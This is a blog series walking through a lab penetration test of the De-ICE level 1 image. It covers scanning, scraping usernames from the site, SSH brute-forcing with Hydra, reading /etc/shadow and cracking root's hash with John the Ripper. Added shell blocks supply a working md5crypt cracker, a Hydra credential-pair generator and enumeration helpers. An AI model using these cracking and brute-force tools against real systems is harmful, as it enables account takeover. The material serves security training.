Wednesday, March 30, 2011

Step 5 - Escalation; owning root

Now that we have a higher-level account with aadams, let's see if we can finally view the /etc/shadow file.

Hmm, what did I do wrong? Oh, let's try sudo first and see if that works.

There it is. The password for root. Pretty clear, isn't it? Wait, it's a hash, not the password itself. Of course. Let's take a look at the different fields in the shadow file, focusing just on root. Each field is separated by a colon (:)

Login name
Hashed password (the $id$ prefix names the algorithm, for example $1$ for md5crypt and $6$ for sha512crypt; a leading ! or * means the account is locked)
Days since Jan 1 1970 that the password was last changed
Minimum days before the password may be changed again
Maximum days after which the password must be changed
Days before password expiry that the user is warned
Days after password expiry until the account is disabled
Days since Jan 1 1970 on which the account expires (is disabled)
A reserved field
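To make those nine fields concrete, here is an added example (my own shell, not code from the original post) that splits one shadow line, names the hash algorithm from the $id$ prefix, flags locked accounts and works out the password age. The two sample lines are constructed; the hash strings are placeholders of the right shape, not hashes from the De-ICE image.

```shell
#!/bin/sh
# Added example, not code from the original post: split one /etc/shadow line
# into its fields and report what an attacker (or auditor) cares about.
# The sample lines at the bottom are constructed; the hash strings are
# placeholders of the right shape, not real hashes from the De-ICE image.

# shadow_report LINE [TODAY] -> "user=<u> algo=<a> status=<s> age_days=<n>"
# TODAY is days since 1970-01-01 and defaults to now; it is a parameter so the
# function gives the same answer every time it is tested.
shadow_report() {
    line=$1
    today=${2:-$(( $(date +%s) / 86400 ))}

    # Field order: name:hash:lastchg:min:max:warn:inactive:expire:reserved
    name=$(printf '%s' "$line" | cut -d: -f1)
    hash=$(printf '%s' "$line" | cut -d: -f2)
    lastchg=$(printf '%s' "$line" | cut -d: -f3)

    # A hash starting with ! or *, or an empty one, means no usable password.
    case "$hash" in
        '!'*|'*'*|'') status=locked ;;
        *)            status=active ;;
    esac

    # The $id$ prefix is the crypt(3) algorithm; John reads it from the same place.
    case "$hash" in
        '$1$'*)          algo=md5crypt ;;
        '$5$'*)          algo=sha256crypt ;;
        '$6$'*)          algo=sha512crypt ;;
        '$y$'*)          algo=yescrypt ;;
        '$7$'*)          algo=scrypt ;;
        '$2'[abxy]'$'*)  algo=bcrypt ;;
        '!'*|'*'*|'')    algo=none ;;
        *)               algo=descrypt ;;   # bare 13-character traditional DES
    esac

    if [ -n "$lastchg" ]; then
        age=$(( today - lastchg ))
    else
        age=unknown
    fi
    printf 'user=%s algo=%s status=%s age_days=%s\n' "$name" "$algo" "$status" "$age"
}

# Constructed samples: TODAY is fixed at 15000 so the ages are reproducible.
SAMPLE_ROOT='root:$1$abcdefgh$0123456789ABCDEFGHIJK.:14900:0:99999:7:::'
SAMPLE_LOCKED='daemon:*:14900:0:99999:7:::'
shadow_report "$SAMPLE_ROOT" 15000     # user=root algo=md5crypt status=active age_days=100
shadow_report "$SAMPLE_LOCKED" 15000   # user=daemon algo=none status=locked age_days=100
```

Run it over the real file with a loop such as while IFS= read -r l; do shadow_report "$l"; done < /etc/shadow. The algorithm column tells you what John will have to crack (md5crypt is far cheaper per guess than sha512crypt or yescrypt), and the age column shows which accounts have not rotated their password in years.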

Now I copied the entire field for root and pasted it into Kate. I'm sure you could download the shadow file to your attacking PC, but this was easier.

Now that I have the password hash for root I needed a way to crack it (a hash can't be decrypted; the cracker hashes candidate passwords and compares them against the target). I used John the Ripper for this.
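The usual John workflow is unshadow /etc/passwd /etc/shadow > target.txt, then john --wordlist=<list> target.txt, and john --show target.txt once it finishes. To show what happens inside that loop, here is an added example (my own shell, not code from the original post or from John) for md5crypt ($1$) hashes: pull the salt out of the target hash, hash every candidate word with the same salt using openssl passwd -1, and compare. It assumes the openssl command-line tool is installed; the target hash is generated in the block from a known word, so nothing here comes from the De-ICE shadow file.

```shell
#!/bin/sh
# Added example, not code from the original post: the loop John the Ripper
# runs for md5crypt ($1$) hashes, written out in shell so the mechanism is
# visible. Lift the salt out of the target hash, hash every candidate with
# that salt, compare. Needs the openssl CLI (openssl passwd -1 is md5crypt).
# The target hash is generated here from a known word, so nothing in this
# block comes from the De-ICE shadow file.

# crack_md5crypt HASH  (candidates on stdin) -> prints the match, returns 1 if none
crack_md5crypt() {
    target=$1
    # Layout is $1$<salt>$<digest>, so field 3 on '$' is the salt (up to 8 chars)
    salt=$(printf '%s' "$target" | cut -d'$' -f3)
    while IFS= read -r word; do
        [ -z "$word" ] && continue
        guess=$(openssl passwd -1 -salt "$salt" "$word")
        if [ "$guess" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done
    return 1
}

# Constructed demo: a hash of "toor" with a fixed salt, attacked with a tiny wordlist.
DEMO_HASH=$(openssl passwd -1 -salt qwerty12 'toor')
demo_crack() {
    printf '%s\n' password 123456 root letmein toor admin | crack_md5crypt "$DEMO_HASH"
}
demo_crack   # toor
```

Feed it a real wordlist with crack_md5crypt "$hash" < /usr/share/wordlists/<list>. It is thousands of times slower than John because each guess forks openssl, which is exactly why you reach for John in practice, but the salt handling and the compare are the same.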

And there we go. We now have the root password for our target machine.

Step 5 - Escalation

Now that we have a username and password we can begin working on getting root access.

The first step I took was checking out the /etc/passwd file. I wanted to see what other usernames were valid and what other information I could gather. Let's take a look at the file.

We can see that the user accounts aadams, bbanter and ccoffee all exist on this server. The passwd file might look a little intimidating at first, but it's pretty easy to break down. The first field contains the username, followed by the password field. This is usually just an x, meaning the password hash lives in the shadow file (a * or ! here means the account has no usable password). The next field is a number which represents the User-ID. In our case bbanter has a UID of 1001.

Next is the Group-ID. We see that bbanter and ccoffee both have a GID of 100. Notice the aadams account has a GID of 10. On Slackware-derived systems such as Slax, GID 10 is normally the wheel group, and wheel is a common choice for who gets sudo, so that is worth checking in /etc/group and, once you have a shell as that user, with sudo -l.

After the group ID is the GECOS field, which stores various user info, followed by the home directory and the login shell.
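The GID column only tells you the primary group; supplementary membership lives in /etc/group. Here is an added example (my own shell, not code from the original post) that reads the two files together, keeps only accounts with a real login shell, and lists which of them sit in a group that commonly carries sudo rights. Both files are constructed to resemble the Slax target and are not copies of the real ones; the group names treated as privileged (wheel, sudo, admin) are my assumption about common distributions, so confirm against the target's /etc/sudoers.

```shell
#!/bin/sh
# Added example, not code from the original post: read /etc/passwd together
# with /etc/group and answer the question the GID column raises, which of the
# real login accounts sit in a group that usually carries sudo rights.
# Both files below are constructed to resemble the Slax target; they are not
# copies of the real ones.

PASSWD_SAMPLE='root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
sshd:x:33:33:sshd:/:/bin/false
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash'

GROUP_SAMPLE='root:x:0:
bin:x:1:bin
wheel:x:10:root
users:x:100:
sshd:x:33:'

# login_accounts PASSWD -> users whose shell is not /bin/false or *nologin
login_accounts() {
    printf '%s\n' "$1" | awk -F: '$7 !~ /(nologin|false)$/ { print $1 }'
}

# groups_of USER PASSWD GROUP -> group names on one line, primary group first
groups_of() {
    user=$1 passwd=$2 group=$3
    gid=$(printf '%s\n' "$passwd" | awk -F: -v u="$user" '$1 == u { print $4 }')
    primary=$(printf '%s\n' "$group" | awk -F: -v g="$gid" '$3 == g { print $1 }')
    # field 4 of /etc/group is the comma-separated list of supplementary members
    extra=$(printf '%s\n' "$group" | awk -F: -v u="$user" '
        { n = split($4, m, ","); for (i = 1; i <= n; i++) if (m[i] == u) print $1 }')
    printf '%s' "$primary"
    for g in $extra; do
        [ "$g" != "$primary" ] && printf ' %s' "$g"
    done
    printf '\n'
}

# privileged_candidates PASSWD GROUP -> "user: groups" for login accounts in a
# group that commonly maps to sudo (wheel on Slackware/Slax, sudo or admin on Debian)
privileged_candidates() {
    for u in $(login_accounts "$1"); do
        g=$(groups_of "$u" "$1" "$2")
        case " $g " in
            *" wheel "*|*" sudo "*|*" admin "*) printf '%s: %s\n' "$u" "$g" ;;
        esac
    done
}

privileged_candidates "$PASSWD_SAMPLE" "$GROUP_SAMPLE"
# root: root wheel
# aadams: wheel
```

On a real box call it as privileged_candidates "$(cat /etc/passwd)" "$(cat /etc/group)". Both files are world-readable, so this is available to any shell you get, and it tells you which account is worth going after next before you spend time brute-forcing.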

Let's try to gain access to the aadams account.

The first tool I used was BruteSSH.

I let BruteSSH run for a while, but I was impatient, so I killed the process and tried THC-Hydra.

When I ran hydra I got strange output saying it couldn't connect to port 22. I later found out that hydra was running too fast and I needed to add the -T switch and specify the number of login attempts as 8 at a time or fewer.

I then ran into another issue with Hydra. It always quit before going through the entire wordlist and never found the password. After some research I found that Hydra version 5.9 had a problem with its SSH module. I had to download version 6.1 to get it to work.

After installing and running version 6.1, hydra found the password in under 10 minutes.

Step 4 - Penetration

Now that we have some usernames, let's see if we can brute-force some passwords.

I don't have much practice with basic shell scripting, so I decided to see if I could write a basic script that would input the usernames for me and let me put in password guesses manually. Don't laugh too hard at my first attempt.

Yeah, so that one didn't work so well. Actually, it didn't work at all. Here's my second attempt.

This one actually worked. Sure it's ugly, but it did what I wanted. Once the script was running I tried using the username as the password. Surprisingly, the intern (go figure) had a weak password and used his login ID as his password.
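Login-as-password is the first thing worth checking for every enumerated user, and Hydra can do it natively with -e nsr (null, same-as-login, reversed). Two caveats from the hydra I know: -t sets the number of parallel connections per target, while -T is the overall limit used with -M for multiple targets; and OpenSSH's MaxStartups default (10:30:100) starts dropping unauthenticated connections once ten are in flight, which is the usual source of "could not connect" errors during an SSH brute force, so keep -t at 4 or so. Here is an added example (my own shell, not the post's script) that generates the login:password pairs to try first, in the colon-separated format Hydra reads with -C. The usernames are the ones the post enumerated; the guesses are my own choice of weak habits.

```shell
#!/bin/sh
# Added example, not code from the original post: the login:password pairs the
# post tried by hand, generated for every enumerated user in the colon-separated
# format Hydra reads with -C. The usernames are the ones the post found; the
# password guesses (login as password, reversed, with a suffix, a few defaults)
# are our own choice of the weakest habits to check first.

DEFAULT_GUESSES='password 123456 letmein changeme'

# reverse_word WORD -> WORD spelled backwards (awk, so no dependency on rev(1))
reverse_word() {
    printf '%s' "$1" | awk '{ s = ""; for (i = length($0); i > 0; i--) s = s substr($0, i, 1); print s }'
}

# guesses_for USER -> one candidate password per line
guesses_for() {
    u=$1
    printf '%s\n' "$u" "$(reverse_word "$u")" "${u}123" "${u}2011" "${u}${u}"
    printf '%s\n' $DEFAULT_GUESSES
}

# login_pairs USER... -> "user:pass" lines, duplicates dropped, order preserved
login_pairs() {
    for u in "$@"; do
        guesses_for "$u" | while IFS= read -r p; do printf '%s:%s\n' "$u" "$p"; done
    done | awk '!seen[$0]++'
}

login_pairs aadams bbanter ccoffee
# Save that output to pairs.txt and feed it to Hydra:
#   hydra -C pairs.txt -t 4 ssh://TARGET
```

Because the pairs are ordered cheapest-guess-first, the bbanter:bbanter hit the post describes would come out on the first attempt for that user rather than after minutes of wordlist.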

Step 3 - Enumeration continued

We have already identified the host operating system, the services and their versions. What else can we find out about our target? We don't have any usernames yet; how can we get those?

Let's see what web site is running on port 80.

Wow, that page is ugly and hard to read. How else can we view it? Let's use wget to download the page locally, then take a look at it.

Let's take a look at that index2.php page.

Hmm, it looks like there are several email addresses in there. Let's try to parse them out so we can see them more clearly.

Great, we can see that we have emails for the system admin and other users. Let's see if we can refine that list further to display just the emails, with no names or titles.

That's looking good. Let's output the results of our cut to a new txt file for the email IDs.

Great, now let's cut this file and eliminate everything after the @ sign so we can get some usernames.

Next I opened this file with Kate and added the usernames with the initial first (for example, for banterb I added bbanter).

Now we have some usernames we can use to attempt a brute-force attack on our target.
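The grep-and-cut steps above, plus the by-hand reordering in Kate, fit in three small functions. This is an added example (my own shell, not code from the original post); the HTML is a constructed stand-in for index2.php, the domain is a placeholder and the local parts only follow the lastname+initial pattern the post found (banterb), so nothing in it is copied from the target.

```shell
#!/bin/sh
# Added example, not code from the original post: the grep-and-cut steps of
# this post as reusable functions, plus the username variants the post added
# by hand in Kate. The HTML is a constructed stand-in for index2.php: the
# domain is a placeholder and the local parts follow the lastname+initial
# pattern the post found (banterb), so nothing here is copied from the target.

HTML_SAMPLE='<html><body>
<p>A. Adams, Sr. Sysadmin - <a href="mailto:adamsa@example.com">adamsa@example.com</a></p>
<p>B. Banter, Intern (banterb@example.com)</p>
<p>C. Coffee, CEO <a href="mailto:coffeec@example.com">coffeec@example.com</a></p>
<p>Questions: webmaster@example.com</p>
</body></html>'

# extract_emails (HTML on stdin) -> unique addresses, one per line
extract_emails() {
    grep -oE '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}' | sort -u
}

# username_variants LOCALPART -> the local part as found, then the usual
# re-orderings: lastnamef -> flastname, lastname, f.lastname
username_variants() {
    lp=$1
    base=$(printf '%s' "$lp" | sed 's/.$//')          # drop the trailing initial
    init=$(printf '%s' "$lp" | sed 's/.*\(.\)$/\1/')  # keep only the trailing initial
    printf '%s\n' "$lp" "$init$base" "$base" "$init.$base"
}

# usernames_from_html (HTML on stdin) -> candidate logins, unique, one per line
usernames_from_html() {
    extract_emails | cut -d@ -f1 | while IFS= read -r lp; do
        username_variants "$lp"
    done | sort -u
}

printf '%s\n' "$HTML_SAMPLE" | usernames_from_html
```

Use it on the page you fetched with usernames_from_html < index2.php > users.txt. Role addresses such as webmaster produce junk variants (rwebmaste and so on); prune those by eye, the same way the post edited the list in Kate, before handing the file to Hydra.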

Step 3 - Enumeration

The next step in our pentest process is enumeration. During this phase we try to determine the host OS, the services running and their versions.

We already did a little bit of enumeration in my previous post using the Nmap -sV and -O options.

Here are those results again.

Another great tool we can use is Netcat.

Let's use netcat to connect to the Apache web server running on port 80.

To do this we type nc -vv TARGET PORT

After we have a connection, let's pull down the HTTP headers to verify the Apache server info.

Once connected, type HEAD / HTTP/1.0 and then hit the return key twice (the empty line is what ends the request).

The results confirm that this server is running Apache version 2.0.55.

Netcat has a ton of other useful features that we will go into later.
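The same banner grab as a function, with a parser for the Server: header so the value can be compared against what nmap -sV reported. This is an added example (my own shell, not code from the original post); the response text is a constructed sample in the shape an Apache 2.0 server returns, not output captured from De-ICE, and http_head assumes an OpenBSD- or GNU-style nc that accepts -w for its timeout.

```shell
#!/bin/sh
# Added example, not code from the original post: the netcat banner grab as a
# function, and a parser for the Server: header so the result can be compared
# against the nmap -sV output. The response below is a constructed sample in
# the shape an Apache 2.0 server returns; nothing here was captured from De-ICE.

# http_head HOST PORT -> raw response headers (needs a reachable target)
http_head() {
    # HEAD plus one empty line (CRLF CRLF) is a complete request; -w 5 is nc's timeout.
    # Host: is sent because name-based virtual hosts need it; HTTP/1.0 servers ignore it.
    printf 'HEAD / HTTP/1.0\r\nHost: %s\r\n\r\n' "$1" | nc -w 5 "$1" "$2"
}

# server_header (response on stdin) -> value of the Server: header, or "unknown"
server_header() {
    v=$(tr -d '\r' | awk 'tolower($1) == "server:" { sub(/^[^ ]* /, ""); print; exit }')
    printf '%s\n' "${v:-unknown}"
}

RESPONSE_SAMPLE='HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 20:00:00 GMT
Server: Apache/2.0.55 (Unix)
Connection: close
Content-Type: text/html'

printf '%s\n' "$RESPONSE_SAMPLE" | server_header   # Apache/2.0.55 (Unix)
```

Against a live target the pipeline is http_head TARGET 80 | server_header. A mismatch between this banner and the nmap guess is worth noting in your log: Server: is just a string the administrator can change, while nmap's fingerprint comes from behaviour.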

Step 2 - Scanning

Angry IP Scanner showed there are 3 active hosts on my network, but it didn't identify who or what they are.

Before we go any further, it's important to document each step of your pentest. You can use any application you like; I chose the text editor Kate, already installed on BackTrack.

One of the tools you will use a lot is Nmap. Nmap is a free security scanner that can do everything from finding live hosts to operating system identification.

Let's run Nmap and see what shows up on my network.

Just with a basic scan we can get some idea of what's on the network. Check out the .168 scan results. Notice that nmap showed port 139 (NetBIOS) open. This is a pretty clear indication that this target is a Windows box.

Notice anything with the .100 target? Check out port 22. SSH usually indicates a *nix box.

Let's run nmap with -sS, -sV and -O for a SYN scan, version detection and OS detection.

Whoops! That didn't work. I need to be root to run nmap with those options (SYN scans and OS fingerprinting need raw sockets).

Let's try again, just at the .100 box, since this will be my first target.

This scan shows us some great info. We can see which versions of Apache, SSH and other services are running. The scan also identified the target OS as Slax Linux.

Earlier we used Angry IP Scanner to look for hosts. We can do the same thing using Nmap.

Let's run Nmap with -sn (ping scan, no port scan) to look for hosts.

The results are the same as the Angry IP Scanner's. BackTrack has several tools that do basically the same thing. It's really up to you which one you want to learn.
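Once a scan is saved with -oG (grepable output), the questions answered by eye above, which hosts are up and which of them expose a given port, become one awk pass, which matters once the target list is bigger than three hosts. This is an added example (my own shell, not code from the original post); the scan text is constructed to match the network the post describes, so the addresses, banners and OS strings are placeholders, not captured output. The parser only relies on the Host: / Ports: / Ignored State: layout of nmap's grepable format.

```shell
#!/bin/sh
# Added example, not code from the original post: save the scan with -oG
# (grepable output) and answer the questions above with awk instead of by eye,
# which hosts are up, and which of them has a given port open and with what
# banner. The scan below is constructed to match the network described in the
# post; the addresses and banners are placeholders, not captured output.

GNMAP_SAMPLE='# Nmap scan initiated as: nmap -sS -sV -O -oG scan.gnmap 192.168.1.0/24
Host: 192.168.1.1 ()  Status: Up
Host: 192.168.1.1 ()  Ports: 53/open/tcp//domain///, 80/open/tcp//http///  Ignored State: closed (998)
Host: 192.168.1.100 ()  Status: Up
Host: 192.168.1.100 ()  Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 1.99)/, 80/open/tcp//http//Apache httpd 2.0.55 ((Unix))/  Ignored State: closed (998)  OS: Linux 2.6.X
Host: 192.168.1.168 ()  Status: Up
Host: 192.168.1.168 ()  Ports: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///  Ignored State: closed (998)  OS: Microsoft Windows XP
# Nmap done -- 256 IP addresses (3 hosts up) scanned'

# up_hosts (gnmap on stdin) -> addresses nmap reported as Up
up_hosts() {
    awk '/^Host: / && /Status: Up/ { print $2 }'
}

# hosts_with_port PORT (gnmap on stdin) -> "ip service version" for hosts with PORT open
hosts_with_port() {
    awk -v p="$1" '
        /^Host: / && /Ports: / {
            ip = $2
            split($0, half, /Ports: /)                  # half[2]: the port list and what follows
            sub(/[ \t]+Ignored State:.*$/, "", half[2]) # drop the trailing summary and OS guess
            m = split(half[2], ports, /, /)
            for (i = 1; i <= m; i++) {
                # each entry is port/state/proto/owner/service/rpcinfo/version/
                split(ports[i], f, "/")
                if (f[1] == p && f[2] == "open") print ip, f[5], f[7]
            }
        }'
}

printf '%s\n' "$GNMAP_SAMPLE" | up_hosts            # three addresses
printf '%s\n' "$GNMAP_SAMPLE" | hosts_with_port 22  # 192.168.1.100 ssh OpenSSH 4.3 (protocol 1.99)
```

With a real file: hosts_with_port 22 < scan.gnmap gives the *nix candidates and hosts_with_port 139 < scan.gnmap the Windows ones, which is the same split the post made by reading the two scans. Keep the .gnmap alongside your Kate notes; it is the evidence for every claim in the report.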

Step 1 - Footprinting

The first step in any pentest is to gather as much information about the target(s) as possible. This can be done through DNS enumeration, visiting the company's web page, ping sweeps and Google searches.

For my lab I didn't have any Google results or DNS entries to look at, so I skipped straight ahead to looking for active hosts on the target network.

BackTrack has a variety of tools that can help you identify live hosts. I used Angry IP Scanner to look for hosts.

Angry IP Scanner is pretty easy to use: just put in the network range and hit go.

The results show that there are 3 hosts alive on my network. I wonder what they are?

De-Ice level 1

The next few posts will cover my first pentest of the De-ICE level 1 image. I used VMware to run both the De-ICE and BackTrack 4 R2 images on my Windows 7 box.

I set the VMware virtual machines to use bridged networking. This allowed me to connect to the internet from my BackTrack image.

At first I had a hard time figuring out how to start networking on BT4. Initially I was setting it manually using ifconfig eth0 xxxxx, but I wanted it automated and the image to pull an IP from my DHCP server.

To start networking on BackTrack, simply type /etc/init.d/networking start

Wednesday, March 2, 2011

Now What?

I have been working as an admin in a data center for over 10 years now. I spent the first half of my career supporting various windows boxes working with IIS, AD and everything in between. For the last few years I have been supporting the Stratus VOS operating system and spending much more time performing in depth packet analysis on transactions for a major bank.

I've known for a while that I wanted to transition into the security field. Not really knowing where to start, I decided I'd go for the easier Security+ certification. After about a month of studying and lots of practice tests I took my exam. On February 28th I passed with a score of 871/900.

Great! Now what?